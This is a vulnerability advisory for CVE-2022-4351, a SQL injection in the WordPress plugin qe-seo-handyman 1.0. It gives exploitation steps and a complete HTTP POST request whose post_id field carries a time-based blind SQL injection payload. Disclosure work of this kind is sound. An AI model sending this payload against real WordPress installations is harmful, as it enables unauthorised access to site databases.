qe-seo-handyman 1.0 (1/2) WordPress plugin SQL injection
Vulnerability Metadata
| Key | Value |
|---|---|
| Date of Disclosure | December 08 2022 |
| Affected Software | qe-seo-handyman |
| Affected Software Type | WordPress plugin |
| Version | 1.0 |
| Weakness | SQL Injection |
| CWE ID | CWE-89 |
| CVE ID | CVE-2022-4351 |
| CVSS 3.x Base Score | n/a |
| CVSS 2.0 Base Score | n/a |
| Reporter | Daniel Krohmer, Kunal Sharma |
| Reporter Contact | daniel.krohmer@iese.fraunhofer.de |
| Link to Affected Software | https://wordpress.org/plugins/qe-seo-handyman |
| Link to Vulnerability DB | https://nvd.nist.gov/vuln/detail/CVE-2022-4351 |
Vulnerability Description
The save_all_page_meta action in qe-seo-handyman 1.0 is vulnerable to SQL injection. An authenticated attacker may craft a malicious POST request and abuse the post_id data parameter.
Exploitation Guide
Login as admin user. This attack requires at least admin privileges.
The plugin requires all-in-one-seo-pack to be activated.
Head to Qe SEO handy-man.
Add some meta data to an arbitrary page by filling both Meta Title and Meta Description input forms.
Filling the two input forms triggers the vulnerable request. post_id is the vulnerable parameter:
An exploit may look like the following:
In the code, the $post_id variable is written at line 997 in ./qe-seo-handyman.php.
The final database query is executed at line 1021 of the same file.
Exploit Payload
Please note that cookies and nonces need to be changed according to your user settings, otherwise the exploit will not work.
The SQL injection can be triggered by sending the request below.
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/wp-admin/admin.php?page=all-pages-meta
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 122
Origin: http://localhost
Connection: close
Cookie: wordpress_86a9106ae65537651a8e456835b316ab=admin%7C1666351698%7CUJofNZHVUwsYvYTwu9444spfgkOSyZG5EYIEZykf2ty%7Cdf8ca47eb38c60eed341ee876c03fc5f4532f3979762e847e7b386c1ae1f6c06; wp-settings-1=editor%3Dtinymce%26ampamphidetb%3D1%26ampampmfold%3Do%26mfold%3Do; wp-settings-time-1=1666178511; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_86a9106ae65537651a8e456835b316ab=admin%7C1666351698%7CUJofNZHVUwsYvYTwu9444spfgkOSyZG5EYIEZykf2ty%7Ce783238ca312051ff52fba0f96aefdefa985f1cf80194c09a28eea1d94595e56; tk_ai=woo%3AxIFtmbzi40NKIXvwVmH3Vwly; woocommerce_items_in_cart=1; woocommerce_cart_hash=0ed611221b3d80f0fa539cbbda99650c; wp_woocommerce_session_86a9106ae65537651a8e456835b316ab=1%7C%7C1666351832%7C%7C1666348232%7C%7Cc2cb50590cfa7e94229c1621767b0523
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
action=save_all_page_meta&parms=description&meta_description=test2&post_id=2+AND+(SELECT+3477+FROM+(SELECT(SLEEP(5)))DhVP)